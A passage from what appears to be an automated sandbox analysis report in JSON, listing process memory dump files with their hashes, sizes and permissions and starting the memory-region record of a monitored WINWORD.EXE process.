"process_dumps/process_00000008-region_00001650-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001650-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_302", "md5_hash": "5bc59892c3827fe43a9af8f0421aef3b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "67071e101ddfa89ee75a017ac479d9b8d7a7902e", "sha256_hash": "9c4efc3dfc74a6e5ff730b186ae08b639784fd89e612e505dff9d56d793844f1", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001330-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000009-region_00001330-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_248", "md5_hash": "d0e816b5fc8672c8a6c106cbe1e07f5a", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7b2c7640c58044762213b71c2636a4a31b1aa177", "sha256_hash": "653d233d2591d9a47f9696c8698363c742d15e63e50a065244e0709dfbbf4177", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001331-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001331-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_249", "md5_hash": "f9c49f9eee181a2b101554cf2018da92", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9dfb7d96bfcbc1ae7acefba70a1d9fb7c5806600", "sha256_hash": "bbfbe85c696f37e08b3d765cd5a6ba727dc9a547d0f93b84fc7d438f2e01a3b2", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001333-addr_0x0000000000400000-size_0x000000000005b000-perm_rwx.bin", "filename": "process_00000009-region_00001333-addr_0x0000000000400000-size_0x000000000005b000-perm_rwx.bin", "id": "proc_dump_250", "md5_hash": "5fee82e350ebfc3ecfe0ec440bcb3566", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d70389a3e84d6288bd081cccc02d68decf325021", "sha256_hash": "a284a3946dd7b96b048aa476f38c367e3a3bd296319dc39b887d574deb6a71a0", "size": 372736, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001337-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001337-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_251", "md5_hash": "6ddfae9e5ad91b64b4878583be4095de", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dee4a95470ace92c60f91dc0cb4b5baf03d986b8", "sha256_hash": "48503633ed48a12c6ee37d4be00cbf88e90c3d4d2e910ced6f6d1952b0b26a91", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001338-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001338-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_252", "md5_hash": "298f77f9bececd99e1bfcf15c30122d0", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "804daaaf5ccb40a7122024dfe10dc0824af92a8f", "sha256_hash": "d6d4280d4881b2238cde5ff6ef62887a40ce92695092215ec101f6590facc4f7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001362-addr_0x0000000000190000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001362-addr_0x0000000000190000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_255", "md5_hash": "b5ac2a919c1b34955613393b2f668ba2", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f1c24d17b87a3588d9ecc7eee7e8f8d76626a2b9", "sha256_hash": "9b71a167aafc3a4c6fbd5cad03c4377ae9fea95f017c44a639571cd0582dd817", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001367-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000009-region_00001367-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_256", "md5_hash": "14a7fae0f175198146fcdb74ddc35dc5", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f0c56f10f952b4bb1b00788a031961a98822986b", "sha256_hash": "25631fa7b33e5bc3b4b9b0ffe97c79988821cd70bb17118af239c6de89df8ff1", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001392-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001392-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_257", "md5_hash": "df264f1ff9171395d3f48ec10cabf099", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2434334efd8e5690c60fe2c424e77dd7a19e5f3d", "sha256_hash": "e0d778f19ca999dfd5c2f9076bf26c7f39142c9893fbcb6a26315c67d4ee2e21", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001393-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001393-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_258", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001394-addr_0x0000000000350000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000009-region_00001394-addr_0x0000000000350000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_259", "md5_hash": "1e7cc752e460637765865261ab5ddcb3", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c50d3a7f643b93bc89441b3c68c54c972ec62eb8", "sha256_hash": "4245b67f3b1d9246d8e9cb16944b5fb2f9961d8f7b59dab8ac3aaebc9a25758b", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001415-addr_0x0000000001240000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001415-addr_0x0000000001240000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_270", "md5_hash": "2f7a2517176f9f20e1dc6f94efe814ea", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8b6cab28e6651e25273fe58d94d7d040cdbab9d8", "sha256_hash": "783cb13993de0390776166205b9408330e615981ea634da692b1ad142ed0b02b", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001467-addr_0x0000000001610000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001467-addr_0x0000000001610000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_280", "md5_hash": "58edf2f1a2ad7b4f8d3a1b0aa4fb2cda", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4547edf6656444c159d3cd43d407f18e720c427e", "sha256_hash": "26a01edd0cb98b2392f6653d9330a038d42ebda64fcb10edef71420a7d389793", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001469-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001469-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_281", "md5_hash": "e2d6d5bfce921d42428b1a750c28e87f", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1483511703dc8d50d03e9f8317dfdd9327cafafd", "sha256_hash": "d39d763d08096dcb699a93ae41a5521cba12eb9bccc0fa6420844ca11a0bfb5d", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001487-addr_0x0000000001710000-size_0x0000000000101000-perm_rw.bin", "filename": "process_00000009-region_00001487-addr_0x0000000001710000-size_0x0000000000101000-perm_rw.bin", "id": "proc_dump_282", "md5_hash": "19cb5ece015888762777ea5184a1306c", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d03f212f2a90505b209f7f076db8738095422cdc", "sha256_hash": "9eeb06148717269f8f1ee977251af6b34c9978bbe664edcf5b990f8b0628d35a", "size": 1052672, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001510-addr_0x0000000001710000-size_0x00000000000d0000-perm_rw.bin", "filename": "process_00000009-region_00001510-addr_0x0000000001710000-size_0x00000000000d0000-perm_rw.bin", "id": "proc_dump_286", "md5_hash": "a76d01c620baa27b0f0f0e22fc4f9caf", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "676ad05abef7e363e7b4ca8f03b3b6c8d77bc81a", "sha256_hash": "43ae73aae73ebd009ad707c9ecb371bc28bb372117b1ca0833260780e7718e49", "size": 851968, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001511-addr_0x00000000017e0000-size_0x00000000000f0000-perm_rw.bin", "filename": "process_00000009-region_00001511-addr_0x00000000017e0000-size_0x00000000000f0000-perm_rw.bin", "id": "proc_dump_287", "md5_hash": "b65f66ca5ff9e3ba072b93832be14098", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "cea97fd0ff858e67eea0f52c6f704a27ff0744d1", "sha256_hash": "ebd6fba8eb5e359f953f9ade9f4313429b37977de6bdd9379164cdc170107b95", "size": 983040, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001514-addr_0x00000000018d0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001514-addr_0x00000000018d0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_288", "md5_hash": "9d307b1328ed11d5b669fbee60f8c2f6", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c51fa4f00a385fcb098653dce51e63d6781848e5", "sha256_hash": "d49ff8846fee2140f46c6d2c4caedb4c97c9f7b18e498d38e42337a602857d56", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001517-addr_0x00000000019d0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001517-addr_0x00000000019d0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_289", "md5_hash": "135f7f7045df4d74fabd26d021f70f8c", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "030c66cd89f1e3ffdcd7e12e2736a66da1fc603c", "sha256_hash": "c82dafe4f5fe2e40007d684f5732e816cfc5c7ae163961123df2894814821a53", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001518-addr_0x0000000001a00000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000009-region_00001518-addr_0x0000000001a00000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_290", "md5_hash": "4c121ffa7ff61f98b36abf71cdaf186e", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e42679f3cdeea87d0385ba18ac5b104ccdfdf425", "sha256_hash": "dc6ca12264e8514acae075f733313af2dfa1305be82d6efd272750304ac69a33", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001552-addr_0x0000000000160000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000009-region_00001552-addr_0x0000000000160000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_299", "md5_hash": "d6e758cfc5a0b315dc65bcd080802795", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "73fe1ef4beea44a681e42aed3f9016ed7dc69bf6", "sha256_hash": "b94d9da233354a2af9355cba8e097b26b1688b0112606ac655f4b1a15a75f820", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001403-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000010-region_00001403-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_264", "md5_hash": "0965c3cb6dbb136ac77003c665b04f15", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b2188b122b6133753b7539f4e5f7a92bf175859c", "sha256_hash": "b04ee41d43a25b1b3042113ccbf64a222f846bf9c6d62a7382e00bc2ffad6a0a", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001404-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001404-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_265", "md5_hash": "d89ab708eac7c9644ecae9b07bf3c4b8", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d325c843689491feab34ef6e23e4c204c5d18fd0", "sha256_hash": "2f03e24c4050c063031c434c60fe00e06831e823b911136dd55b94be7f706137", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001406-addr_0x0000000000400000-size_0x0000000000019000-perm_rwx.bin", "filename": "process_00000010-region_00001406-addr_0x0000000000400000-size_0x0000000000019000-perm_rwx.bin", "id": "proc_dump_266", "md5_hash": "ccfa5670730f777d25ee7df0d76f2e10", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ebf3a7116704c79965e0adaabf73320c6ce0ee8f", "sha256_hash": "6aa22b051f5b7eb1d49fc2d110e3a0e11021d1fc9831ba786fa22180c99b34ba", "size": 102400, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001410-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001410-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_267", "md5_hash": "c4db2c847069af0465be0e6ba05cc28d", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "000eb7d56d733b3b4764e9d7f06d80cb86a0ea9c", "sha256_hash": "e660d854e76c685093a6f1a8a17aa8dd701a138242391bedff6c40eddc7c4e79", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001411-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001411-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_268", "md5_hash": "544c5c6e6c28029ea97fe445c554b85d", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3dcaaccef206d212173fb177a7d807267bda6640", "sha256_hash": "c797b9a86c35f3d16bc5576d55c5251a7a6dfb8116a285b02f248a6e3b66f47b", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001424-addr_0x00000000001b0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001424-addr_0x00000000001b0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_273", "md5_hash": "fcb3796bdc79cb4edf533c827873b872", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3a8cf386ee621e461b24b5d460fd74965aead7ab", "sha256_hash": "5c6ba17a58d816ad79bc8296db79f0fa5ffb520cd9592c43e3aeb7f4d849bbcb", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001434-addr_0x00000000002b0000-size_0x0000000000070000-perm_rw.bin", "filename": "process_00000010-region_00001434-addr_0x00000000002b0000-size_0x0000000000070000-perm_rw.bin", "id": "proc_dump_274", "md5_hash": "196a6d3ff32f06b6a462d6a72f04749e", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5654138faff2f784ee7a6f05224ad0a58636dc20", "sha256_hash": "849f7b16bed023723b7c3977c977221a7e01af6928209cb3916ef31ce1e7a561", "size": 458752, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001441-addr_0x0000000000310000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000010-region_00001441-addr_0x0000000000310000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_275", "md5_hash": "c2f7c4b75202da84699b0ceee1572a14", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2c407ec068c335408f414ad10bf22a2f1284c820", "sha256_hash": "f2d826d7e3bcc6b0d3216b5f406fdad1ccf7a15d941e85a53ef3cbb3e1767789", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001451-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001451-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_276", "md5_hash": "b3205a587d64487576019603cf2349f3", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bcea2f3f892212a6e3b1d980215a995e4e16bd5a", "sha256_hash": "7f6eb5e2bc8ef7734e99289fda2bddc8d69bec52daf78b4908c1388bbee174fc", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001452-addr_0x00000000002b0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001452-addr_0x00000000002b0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_277", "md5_hash": "ba5e44612514a9d037b9e2474548e565", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "76a6694588a85be7d77f68ad237ec3727b2fdddb", "sha256_hash": "cc781766a6bc163d9f94b2595055c8cb7f0cdf6ce19498a0d6778216ef8e4d3e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001519-addr_0x00000000002d0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001519-addr_0x00000000002d0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_291", "md5_hash": "f3c9b49b19b0491c51b1efce4a65b1d5", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "26773aabf6ae730ea31f633cda95988b8ff369e9", "sha256_hash": "e217264b4d6bbf30084bec9cece8b6b75fe31301a096f8230ddd1d6e55889b58", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001520-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001520-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_292", "md5_hash": "f092caf71a19867591910fd947ef394f", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "294ebcc4238199f07bc38f8e9622d73c3e423bf7", "sha256_hash": "1d6345bb8cd5b8ebe73e1b6e09a77555da0d0209b58e66a3fcaddddb3ece20ce", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001527-addr_0x0000000001400000-size_0x0000000000120000-perm_rw.bin", "filename": "process_00000010-region_00001527-addr_0x0000000001400000-size_0x0000000000120000-perm_rw.bin", "id": "proc_dump_293", "md5_hash": "7250d0cf5fdcd0bded4dad2982c3d665", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "28538cf2ed3a0e9842e97ecffea07099ef7f0aef", "sha256_hash": "9a58ac27dcc2ec1008e55df7c9f146766f08c13edc384a05c60c4f38b415bb64", "size": 1179648, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001538-addr_0x00000000014e0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000010-region_00001538-addr_0x00000000014e0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_294", "md5_hash": "5429a750bdf0d50e8566164f5bc8b237", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "02f01c68bf56302f1f110a359bf11b6d6dabdbc9", "sha256_hash": "721c21a8b6db3fe688983959864950d23b148cb7a4c33480d3f067df771e14c8", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001540-addr_0x0000000001920000-size_0x0000000000200000-perm_rw.bin", "filename": "process_00000010-region_00001540-addr_0x0000000001920000-size_0x0000000000200000-perm_rw.bin", "id": "proc_dump_295", "md5_hash": "b47240228bfa0c3d22eedbbc02cf1845", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4fa2483f01105934a9a8f1d12fbf4a48bafb81ae", "sha256_hash": "4236ce1b958987dfda060d3d48517fc7616b883a40c09422b2ec7a75d2c32173", "size": 2097152, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001543-addr_0x0000000001920000-size_0x0000000000090000-perm_rw.bin", "filename": "process_00000010-region_00001543-addr_0x0000000001920000-size_0x0000000000090000-perm_rw.bin", "id": "proc_dump_296", "md5_hash": "4d5baacfc72bb1e2cf552c805e46fcba", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f7ec9d9335378e53e5449f5a4cc04c1d8873ad30", "sha256_hash": "96d27decd960a389341ecc8e768a9e190784c9f1e60efbe5196716d66f28f2b6", "size": 589824, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001544-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000010-region_00001544-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_297", "md5_hash": "6cdc9840f19a075311be98d462fe19df", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "adef45bc976a0908b41fa59d9cd9a94aa11a5235", "sha256_hash": "4f67041f41a8e0dd9a1e1e8fa7e5fe6d51d1478cc48ecc3b24c55461cbb1fef3", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001547-addr_0x0000000002450000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000010-region_00001547-addr_0x0000000002450000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_298", "md5_hash": "373b32e9b7af5d4cb256efbd946cbd64", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d56fc01f3039efc40234d88ffc7d737b33cca769", "sha256_hash": "10fb698802e0a59dd9db2218ac59ce56913558e1a5dbc7fffb3e99998e620fb9", "size": 524288, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_137", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 331775, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_139", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 1507328, "filename": "\\Windows\\System32\\locale.nls", "id": "region_141", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_143", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 